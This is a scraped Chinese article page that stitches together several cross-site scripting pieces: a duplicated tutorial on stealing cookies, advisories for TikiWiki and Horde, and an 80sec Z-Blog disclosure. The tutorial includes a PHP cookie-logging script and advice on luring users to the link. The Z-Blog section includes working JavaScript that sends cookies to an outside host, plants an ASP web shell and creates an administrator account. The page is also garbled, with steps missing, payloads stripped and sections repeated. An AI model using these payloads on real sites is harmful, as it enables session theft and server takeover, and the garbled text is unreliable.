首页 > 实用文档 > 其他范文

跨站脚本执行漏洞代码的几点思路

2022-05-06 14:31:55| 收藏本文下载本文作者：Arielzz

下面小编为大家整理了跨站脚本执行漏洞代码的几点思路(共含8篇），欢迎阅读与借鉴!同时，但愿您也能像本文投稿人“Arielzz”一样，积极向本站投稿分享好文章。

跨站脚本执行漏洞代码的几点思路

篇1：跨站脚本执行漏洞代码的几点思路

，

后面的header语句则纯粹是为了增加隐蔽性。

3．如果上面的URL能够正确运行的话，下一步就是诱使登陆xxx.net的用户访问该URL，而我们就可以获取该用户Cookie中的敏感信息。

5. 就可以自己构造一个下面的头像文件：

thiz.gif

6.新建一个x.gif，内容如下：

篇2：跨站脚本执行漏洞代码的六点思路脚本安全

1．构造一个提交，目标是能够显示用户Cookie信息：

www.xxxx.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6

2．如果上面的请求获得预期的效果，那么我们就可以尝试下面的请求：

www.xxx.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6

其中www.xxx.org/info.php是你能够控制的某台主机上的一个脚本，功能是获取查询字符串的信息，内容如下：

$info = getenv(“QUERY_STRING”);

if ($info) {

$fp = fopen(“info.txt”,“a”);

fwrite($fp,$info.“n”);

fclose($fp);

}

header(“Location: www.xxx.net”);

注：“%2B”为“+”的URL编码，并且这里只能用“%2B”，因为“+”将被作为空格处理，

篇3：跨站脚本执行漏洞代码的六个方法

style=“display:block;padding:0px 10px;” class=“ContentFont”>

下面是六条：

1．构造一个提交，目标是能够显示用户Cookie信息：

www.xxxx.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6

2．如果上面的请求获得预期的效果，那么我们就可以尝试下面的请求：

www.xxx.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6

其中www.xxx.org/info.php是你能够控制的某台主机上的一个脚本，功能是获取查询字符串的信息，内容如下：

$info = getenv(“QUERY_STRING”);

if ($info) {

$fp = fopen(“info.txt”,“a”);

fwrite($fp,$info.“n”);

fclose($fp);

}

header(“Location: www.xxx.net”);

注：“%2B”为“+”的URL编码，并且这里只能用“%2B”，因为“+”将被作为空格处理，

跨站脚本执行漏洞代码的六个方法

，

后面的header语句则纯粹是为了增加隐蔽性。

3．如果上面的URL能够正确运行的话，下一步就是诱使登陆xxx.net的用户访问该URL，而我们就可以获取该用户Cookie中的敏感信息。

5. 就可以自己构造一个下面的头像文件：

thiz.gif

6.新建一个x.gif，内容如下：

篇4：TikiWiki tikispecialchars.php跨站脚本执行漏洞

TikiWiki 可能很多人知道维基百科的会熟悉

发布日期：-12-24

更新日期：2007-12-25

受影响系统：

TikiWiki Project TikiWiki 1.9.8.3

不受影响系统：

TikiWiki Project TikiWiki 1.9.9

描述：

BUGTRAQID: 27004

TikiWiki是一款网站内容管理系统，基于PHP+ADOdb+Smarty等技术构建，

TikiWiki的tiki-special_chars.php文件没有正确地验证area_name参数，允许远程攻击者通过恶意的HTTP请求执行跨站脚本攻击。

以下是/tikiwiki/tiki-special_chars.php文件的166-168行中的漏洞代码：

').value=window.opener.document.getElementById('').value+getElementById('spec').value;“ name=”ins“ value=”ins“ />

”>, you can see it..

<*来源：Mesut Timur （mesut@h-labsorg）

链接：marc.info/?l=bugtraq&m=119851167307795&w=2

secunia.com/advisories/28225/

tikiwiki.org/ReleaseProcess199

建议：

厂商补丁：

TikiWiki Project

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.9.tar.gz?modtime=1198314005&big_mirror=1

【绿盟授权51CTO.COM 独家报道，未经书面许可不得！】

篇5：Horde产品search.php模块跨站脚本执行漏洞

受影响系统：Horde Horde < 3.1.2

Horde IMP < 4.1.3不受影响系统：Horde Horde 3.1.2

Horde IMP 4.1.3描述：

BUGTRAQ ID: 19544

Horde是个以PHP为基础的架构，用来创建网络应用程式，

在Horde产品的搜索屏幕中，一些指定的字段存在跨站脚本漏洞：

Virtual folder label:

name=“vfolder_label” value=“”>“ />

攻击者可以通过HTTP POST请求注入恶意脚本，

<*来源：Marc Ruef （marc.ruef@computec.ch）

链接：marc.theaimsgroup.com/?l=bugtraq&m=115575007030746&w=2#3

建议：

厂商补丁：

Horde

-----

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

www.horde.org

篇6：Zblog跨站脚本攻击漏洞

style=”display:block;padding:0px 10px;“ class=”ContentFont“>漏洞说明：Z-Blog是一款基于Asp平台的Blog博客(网志)程序，支持Wap，支持Firefox，Oprea等浏览器，在国内使用非常广泛，官方主页在www.rainbowsoft.org/，Z-blog代码严谨，前台功能简洁，后台功能强大，这为它的产品安全带来很大的优势，但是80sec在产品中发现一个严重的跨站脚本攻击漏洞，加上产品设计上的一些问题可能带来严重的后果。

漏洞厂商：www.rainbowsoft.org/

漏洞解析：在FUNCTION/c_urlredirect.asp中，程序对提交的url参数做如下处理

strUrl=URLDecodeForAntiSpam(Request.QueryString(”url“))

其中URLDecodeForAntiSpam是防止垃圾连接的解码函数，其函数处理如下

Function URLDecodeForAntiSpam(strUrl)

Dim i,s

For i =1 To Len(strUrl) Step 2

s=s & Mid(strUrl,i,1)

URLDecodeForAntiSpam=s

End Function

在做如上处理之后程序将在c_urlredirect.asp输出url参数

...

…

精心构造url参数将能构造一个url类型的非持久xss如下：

127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1×2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex

上述url访问之后将引入127.0.0.1/1.js执行，其中可以写任意js代码。

而z-blog的所有安全设计全部用来抵御前台的攻击，对于后台基本没有任何限制，加上antispam功能对用户提交的url连接类似于加密处理，所以很容易就可以诱惑别人访问上述的xss攻击url，可以发表评论如下：

看这个站，有新东西？

www.80sec.com

用户看到的是www.80sec.com这个信任的站点，而一旦点击将在www.foo.com域执行恶意用户指定的js，在该js里可以写shell，添加用户，偷取COOKIE然后模拟出真正的转向，整个过程很难发现攻击的意图，80sec提供js如下：

xmlhttp=poster;

cookie=document.cookie;

tolocation='www.80sec.com/';

//get cookie

x=new Image();

x.src=”www.80sec.com/c.php?c=“+escape(document.cookie);

//get a shell

data=”txaContent=<%25execute(request(%22a%22))%25>“;

postmydata(”www.0×37.com/cmd.asp?act=SiteFilePst&path=%2E%2FUPLOAD%2Findex%2Easp&opath=”,data);

//add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.com&edtHomePage=&edtAlias=”;

postmydata(”www.0×37.com/cmd.asp?act=UserCrt”,data);

//fool the user

window.location=tolocation;

function poster(){

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType(’text/xml’);

}

} else if(window.ActiveXObject) {

var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

return request;

}

function postmydata(action,data){

xmlhttp.open(“POST”, action, false);

xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

xmlhttp.send(data);

return xmlhttp.responseText;

}